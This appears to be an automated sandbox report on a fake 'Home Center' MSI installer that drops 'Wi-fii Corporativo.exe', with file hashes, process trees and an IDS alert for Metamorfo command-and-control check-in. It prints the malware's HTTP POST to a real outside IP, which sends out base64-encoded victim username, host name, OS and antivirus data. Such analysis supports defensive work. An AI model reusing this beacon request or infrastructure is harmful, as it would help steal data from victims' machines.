                                              Preview:...@IXOS.@.....@dt/Z.@.....@.....@.....@.....@.....@......&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}..Home Center..fiF8mxzUfw.msi.@.....@.....@.....@........&.{E5EC307B-28AA-4ABE-BD52-84862F31CDBE}.....@.....@.....@.....@.......@.....@.....@.......@......Home Center......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{C2C4E849-6E64-4794-8828-922124BA13B1};.C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\.@.......@.....@.....@......&.{3E136FF7-1E57-4F46-B6D8-8A1257E82A5E}/.01:\Software\@MicrosoftHome\Home Center\Version.@.......@.....@.....@......&.{F713780B-33DB-4A09-BFED-2E1AED853CCA}H.C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll.@.......@.....@.....@......&.{31AB5A48-AD77-44ED-A16F-552ACC228D02}Q.C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe.@.......@
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):20480
                                              Entropy (8bit):1.1639847015246827
                                              Encrypted:false
                                              SSDEEP:12:JSbX72FjR9aAGiLIlHVRpZh/7777777777777777777777777vDHFrDvAS4it/lN:Jn9aQI5tt19iF
                                              MD5:CB261BDCD4598592A3711F9FF60EB7AE
                                              SHA1:318C25BB70F1B26C5672E3357BB1F0D669D7112A
                                              SHA-256:7E5B13B801C70CA775E6FDC185B2D337397DD2EAC53BAA40AD9711F4A1127CAD
                                              SHA-512:528FE7797045C716948AC430952E41822C3F06E7239BBC39138AE5885FE13EB4CA85E60F5537F16C17A44AD41E3D0F5BF1318115A741ADB9FBE11BF18D0B9873
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):20480
                                              Entropy (8bit):1.5456755116609893
                                              Encrypted:false
                                              SSDEEP:48:18PhquRc06WXJWnT5Ffz0j8+SpkAErCyN0+SpCTe:Yhq1tnT7fAjZ8wCsS
                                              MD5:9ABE3670ED36B36F3C55BCCB2A34F173
                                              SHA1:3B25F26E24158F064C950A7DA53015062F5340A6
                                              SHA-256:7126FFA5AB2F329B8A624F1C00BCEB29E8DEC59480E06DFBAF10AD23C42E731D
                                              SHA-512:DD26FE51722A156A85606345F343CFF3A00DFDC5EACB0374C6ACA678B3CE93B92C168DDEE3A661F94217304819FA11A16BA6BD7BD2BEF57526A70B0DD71E6E10
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):364484
                                              Entropy (8bit):5.365494372987774
                                              Encrypted:false
                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauF:zTtbmkExhMJCIpEO
                                              MD5:E81B102311F8ED629034479B7DCE7557
                                              SHA1:E1BFCC6D1E9C2BD58A4DD206E3CF3CB0CD8F4EC3
                                              SHA-256:13D59CACBC7259F18141DE8E924D518B1D8A359E87E1657194F6507FAD3152AF
                                              SHA-512:DFA5DE3FA3430244B8DC8743AA93805D4BF5D3DDB5B7F9098C2EF1D8B10BCE193BFD0F9AF3C070FEAFCFBF5D95160503C74FD76EC7F08B7FABB9BEBB132BBA74
                                              Malicious:false
                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):20480
                                              Entropy (8bit):1.5456755116609893
                                              Encrypted:false
                                              SSDEEP:48:18PhquRc06WXJWnT5Ffz0j8+SpkAErCyN0+SpCTe:Yhq1tnT7fAjZ8wCsS
                                              MD5:9ABE3670ED36B36F3C55BCCB2A34F173
                                              SHA1:3B25F26E24158F064C950A7DA53015062F5340A6
                                              SHA-256:7126FFA5AB2F329B8A624F1C00BCEB29E8DEC59480E06DFBAF10AD23C42E731D
                                              SHA-512:DD26FE51722A156A85606345F343CFF3A00DFDC5EACB0374C6ACA678B3CE93B92C168DDEE3A661F94217304819FA11A16BA6BD7BD2BEF57526A70B0DD71E6E10
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):1.2405184461831786
                                              Encrypted:false
                                              SSDEEP:48:/xiuFM+CFXJ1T5tfz0j8+SpkAErCyN0+SpCTe:JiHdTTfAjZ8wCsS
                                              MD5:44759C84E360A7FC2E55332B7416E81F
                                              SHA1:58878F862F9401FD3425BEB92AE8D9DD4ED8D6B9
                                              SHA-256:6406863C2518ED9A354A5165AEA9BBA2096BDBE88C0891F366289AD3D34BAFCB
                                              SHA-512:5DD77EE020DD5775ECB2545DC7AA640927C2166B4DAB5B987CDA025061C65A89A438041D8E0633CEBFCE2ACF1C0C4D56AD089D6A91CB32237542417BD9EE0036
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):73728
                                              Entropy (8bit):0.13111482496532176
                                              Encrypted:false
                                              SSDEEP:24:WKn3sTx0YMaEipV0YMa20YMaEipV0YMauAEV0yjCyDhVQwGmoc+6dwa:r8TN+SpA+SpkAErCyNCcVGa
                                              MD5:6977B25F07C67F4022F7EF03C3034C66
                                              SHA1:1E19B8BB26E9864C342AD0B36675F4BFB05F627E
                                              SHA-256:8021B38C73B22293CB0A70883D5F33E08FE9255F54B21E6C1B78923C887A5AA3
                                              SHA-512:FD225722D23CBA50ED0132643B196ADCFE3656011E5C9A77AC3EE4B83FA6A4BB40B292852B92A5009ECF258942A816507B47C8C1E48880E2185ABC282F5AA8D6
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):20480
                                              Entropy (8bit):1.5456755116609893
                                              Encrypted:false
                                              SSDEEP:48:18PhquRc06WXJWnT5Ffz0j8+SpkAErCyN0+SpCTe:Yhq1tnT7fAjZ8wCsS
                                              MD5:9ABE3670ED36B36F3C55BCCB2A34F173
                                              SHA1:3B25F26E24158F064C950A7DA53015062F5340A6
                                              SHA-256:7126FFA5AB2F329B8A624F1C00BCEB29E8DEC59480E06DFBAF10AD23C42E731D
                                              SHA-512:DD26FE51722A156A85606345F343CFF3A00DFDC5EACB0374C6ACA678B3CE93B92C168DDEE3A661F94217304819FA11A16BA6BD7BD2BEF57526A70B0DD71E6E10
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):0.07151731198088712
                                              Encrypted:false
                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOrHjN9AfmrIDMhHHgVky6lit/:2F0i8n0itFzDHFrDvASLit/
                                              MD5:BE7C39186CC66A6FF09E9C10BD92250D
                                              SHA1:1DCAA711F3A76BC3A0A5711BD01CD69888B82B92
                                              SHA-256:3F5A8775FC2EA416A2B833BEC0AB85F0EB3E5748C8FE4A116648B2AE335228BD
                                              SHA-512:982303AA2EFD4A22ACCD3A30ACE57BD6E20C899AF2347B526E76EAF1355D78D9AD84DAAB2F936865BEC6A63F56842106D176C96F5130CE8FCFAD127882BF2700
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):1.2405184461831786
                                              Encrypted:false
                                              SSDEEP:48:/xiuFM+CFXJ1T5tfz0j8+SpkAErCyN0+SpCTe:JiHdTTfAjZ8wCsS
                                              MD5:44759C84E360A7FC2E55332B7416E81F
                                              SHA1:58878F862F9401FD3425BEB92AE8D9DD4ED8D6B9
                                              SHA-256:6406863C2518ED9A354A5165AEA9BBA2096BDBE88C0891F366289AD3D34BAFCB
                                              SHA-512:5DD77EE020DD5775ECB2545DC7AA640927C2166B4DAB5B987CDA025061C65A89A438041D8E0633CEBFCE2ACF1C0C4D56AD089D6A91CB32237542417BD9EE0036
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):1.2405184461831786
                                              Encrypted:false
                                              SSDEEP:48:/xiuFM+CFXJ1T5tfz0j8+SpkAErCyN0+SpCTe:JiHdTTfAjZ8wCsS
                                              MD5:44759C84E360A7FC2E55332B7416E81F
                                              SHA1:58878F862F9401FD3425BEB92AE8D9DD4ED8D6B9
                                              SHA-256:6406863C2518ED9A354A5165AEA9BBA2096BDBE88C0891F366289AD3D34BAFCB
                                              SHA-512:5DD77EE020DD5775ECB2545DC7AA640927C2166B4DAB5B987CDA025061C65A89A438041D8E0633CEBFCE2ACF1C0C4D56AD089D6A91CB32237542417BD9EE0036
                                              Malicious:false
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E5EC307B-28AA-4ABE-BD52-84862F31CDBE}, Number of Words: 10, Subject: Home Center, Author: @MicrosoftHome, Name of Creating Application: Home Center, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Home Center., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Jan 6 17:55:54 2025, Last Saved Time/Date: Mon Jan 6 17:55:54 2025, Last Printed: Mon Jan 6 17:55:54 2025, Number of Pages: 450
                                              Entropy (8bit):7.9720569313982494
                                              TrID:
                                              • Windows SDK Setup Transform Script (63028/2) 47.91%
                                              • Microsoft Windows Installer (60509/1) 46.00%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                              File name:fiF8mxzUfw.msi
                                              File size:23'667'712 bytes
                                              MD5:878933ddb3c232ad3d24df9248d143ad
                                              SHA1:ad166a8895b669a267f8dd05a86f373c29a2cc05
                                              SHA256:e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05
                                              SHA512:9bef0a6c8d46118ed7589f97de5a49f03a17dbb0408e7c5da38b462a885e60a8d8737fc09cbbdf08adc5c5ed72c141560f9e99401051b723d1f0a819ad456713
                                              SSDEEP:393216:nkiS2W8FlnP/iiJoNAg/n+HwFdzFUZA5pfSCManDT2w4rzsJ/ADt1fpsybiY05UY:nA2WG/iiJoNAgGHi15UYDafrzS/E65R
                                              TLSH:A03733267687C139F56E45B7E929FE5E413D7E63073001E3B2F5399A89B08C1A27DB02
                                              File Content Preview:........................>...................j...................................F.......c.......o..............................................................................................................................................................
                                              Icon Hash:2d2e3797b32b2b99
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-15T20:35:42.812878+01002833187ETPRO MALWARE Win32/Metamorfo CnC Checkin1192.168.2.54971115.228.77.17880TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 15, 2025 20:35:21.434344053 CET4971180192.168.2.515.228.77.178
                                              Jan 15, 2025 20:35:21.439291954 CET804971115.228.77.178192.168.2.5
                                              Jan 15, 2025 20:35:21.439433098 CET4971180192.168.2.515.228.77.178
                                              Jan 15, 2025 20:35:21.439548016 CET4971180192.168.2.515.228.77.178
                                              Jan 15, 2025 20:35:21.444284916 CET804971115.228.77.178192.168.2.5
                                              Jan 15, 2025 20:35:21.444351912 CET4971180192.168.2.515.228.77.178
                                              Jan 15, 2025 20:35:21.681444883 CET804971115.228.77.178192.168.2.5
                                              Jan 15, 2025 20:35:42.812726021 CET804971115.228.77.178192.168.2.5
                                              Jan 15, 2025 20:35:42.812877893 CET4971180192.168.2.515.228.77.178
                                              Jan 15, 2025 20:35:42.813045025 CET4971180192.168.2.515.228.77.178
                                              Jan 15, 2025 20:35:42.817806959 CET804971115.228.77.178192.168.2.5
                                              Jan 15, 2025 20:35:49.850397110 CET5992253192.168.2.5162.159.36.2
                                              Jan 15, 2025 20:35:49.855226040 CET5359922162.159.36.2192.168.2.5
                                              Jan 15, 2025 20:35:49.856039047 CET5992253192.168.2.5162.159.36.2
                                              Jan 15, 2025 20:35:49.860868931 CET5359922162.159.36.2192.168.2.5
                                              Jan 15, 2025 20:35:50.323038101 CET5992253192.168.2.5162.159.36.2
                                              Jan 15, 2025 20:35:50.328133106 CET5359922162.159.36.2192.168.2.5
                                              Jan 15, 2025 20:35:50.328196049 CET5992253192.168.2.5162.159.36.2
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 15, 2025 20:35:49.849761963 CET5354268162.159.36.2192.168.2.5
                                              Jan 15, 2025 20:35:50.341856003 CET53508511.1.1.1192.168.2.5
                                              • 15.228.77.178
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54971115.228.77.178807732C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 15, 2025 20:35:21.439548016 CET271OUTPOST /ytr/serv.php HTTP/1.0
                                              Connection: keep-alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 142
                                              Host: 15.228.77.178
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                              Jan 15, 2025 20:35:21.444351912 CET142OUTData Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 59 57 78 6d 62 32 35 7a 26 63 6e 61 6d 65 3d 4d 6a 45 77 4f 54 63 35 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48 4a 76 49
                                              Data Ascii: vv=10&vw=&mods=&uname=YWxmb25z&cname=MjEwOTc5&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iav=V2luZG93cyBEZWZlbmRlcg


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:14:35:06
                                              Start date:15/01/2025
                                              Path:C:\Windows\System32\msiexec.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fiF8mxzUfw.msi"
                                              Imagebase:0x7ff70d7e0000
                                              File size:69'632 bytes
                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:1
                                              Start time:14:35:06
                                              Start date:15/01/2025
                                              Path:C:\Windows\System32\msiexec.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                              Imagebase:0x7ff70d7e0000
                                              File size:69'632 bytes
                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:3
                                              Start time:14:35:07
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673
                                              Imagebase:0x4b0000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:14:35:10
                                              Start date:15/01/2025
                                              Path:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
                                              Imagebase:0x510000
                                              File size:19'128 bytes
                                              MD5 hash:8AAF6B0EF4409498EAA1F506819285CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:low
                                              Has exited:false

                                              Target ID:7
                                              Start time:14:35:53
                                              Start date:15/01/2025
                                              Path:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
                                              Imagebase:0x510000
                                              File size:19'128 bytes
                                              MD5 hash:8AAF6B0EF4409498EAA1F506819285CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:14:36:02
                                              Start date:15/01/2025
                                              Path:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
                                              Imagebase:0x510000
                                              File size:19'128 bytes
                                              MD5 hash:8AAF6B0EF4409498EAA1F506819285CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:14:36:09
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
                                              Imagebase:0x210000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:14:36:12
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
                                              Imagebase:0x210000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:14:37:48
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
                                              Imagebase:0x210000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:14:37:50
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
                                              Imagebase:0x210000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:5.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12.6%
                                                Total number of Nodes:95
                                                Total number of Limit Nodes:3
                                                execution_graph 307 5110e1 308 5110ed ___scrt_is_nonwritable_in_current_image 307->308 329 5113ef 308->329 310 5110f4 312 51111d 310->312 337 5116f6 IsProcessorFeaturePresent 310->337 313 511121 _initterm_e 312->313 318 51116a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 312->318 314 51114d _initterm 313->314 315 51113c ___scrt_is_nonwritable_in_current_image 313->315 314->318 316 5111bd 333 511811 memset GetStartupInfoW 316->333 318->316 320 5111b5 _register_thread_local_exe_atexit_callback 318->320 320->316 325 5111e2 exit 326 5111e8 325->326 327 5111f1 ___scrt_uninitialize_crt 326->327 328 5111ec _cexit 326->328 327->315 328->327 330 5113f8 329->330 343 5119be IsProcessorFeaturePresent 330->343 332 511404 ___scrt_uninitialize_crt 332->310 334 5111c2 _get_wide_winmain_command_line 333->334 335 511000 TbsAppInstance 334->335 336 511006 335->336 341 511847 GetModuleHandleW 336->341 338 511711 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 337->338 339 51170c 337->339 340 5117fe 338->340 339->338 340->310 342 5111de 341->342 342->325 342->326 344 5119e4 343->344 344->332 362 511023 _set_app_type 385 51167e 362->385 364 511030 _set_fmode __p__commode 365 511042 pre_c_initialization 364->365 386 511428 365->386 367 5110bf 368 5116f6 ___scrt_fastfail 6 API calls 367->368 369 5110c6 ___scrt_initialize_default_local_stdio_options 368->369 370 51104b __RTC_Initialize 370->367 395 5115c9 370->395 372 511064 pre_c_initialization 373 511069 _configure_wide_argv 372->373 373->367 374 511075 373->374 398 511684 InitializeSListHead 374->398 376 51107a pre_c_initialization 377 511083 __setusermatherr 376->377 378 51108e pre_c_initialization 376->378 377->378 399 511693 _controlfp_s 378->399 380 51109d pre_c_initialization 381 5110a2 _configthreadlocale 380->381 382 5110ae ___scrt_uninitialize_crt 381->382 383 5110b2 _initialize_wide_environment 382->383 384 5110b7 pre_c_initialization 382->384 383->384 385->364 387 511436 386->387 391 51143b ___scrt_release_startup_lock 386->391 388 5114b7 387->388 387->391 389 5116f6 ___scrt_fastfail 6 API calls 388->389 390 5114be 389->390 392 511448 _initialize_onexit_table 391->392 393 511457 391->393 392->393 394 51145b _initialize_onexit_table 392->394 393->370 394->393 404 51158e 395->404 398->376 400 5116ab 399->400 401 5116ac 399->401 400->380 402 5116f6 ___scrt_fastfail 6 API calls 401->402 403 5116b3 402->403 403->380 405 5115b2 _register_onexit_function 404->405 406 5115ab _crt_atexit 404->406 407 5115bd 405->407 406->407 407->372 345 511897 346 5118cc 345->346 347 5118a7 345->347 347->346 348 5118d2 terminate 347->348 408 511206 _seh_filter_exe 409 511249 412 5115de 409->412 411 51124e 411->411 413 511601 412->413 414 51160e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 412->414 413->414 415 511605 413->415 414->415 415->411 349 51127b IsProcessorFeaturePresent 350 51128f 349->350 353 511253 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 350->353 352 511372 353->352 354 51199b _except_handler4_common 355 51121a 356 511847 GetModuleHandleW 355->356 357 511222 356->357 358 511226 _exit 357->358 359 51122e 357->359 358->359 360 511234 _c_exit 359->360 361 511239 ___scrt_is_nonwritable_in_current_image 359->361 360->361 416 5110cf 420 51188b SetUnhandledExceptionFilter 416->420 418 5110d4 pre_c_initialization 419 5110d9 _set_new_mode 418->419 420->418

                                                Callgraph

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 511000 TbsAppInstance 1 511006-51100f 0->1
                                                APIs
                                                • TbsAppInstance.CEF_FRAME(005111D7,00510000,00000000,00000000,?,00000007,005124E8,00000014), ref: 00511000
                                                Memory Dump Source
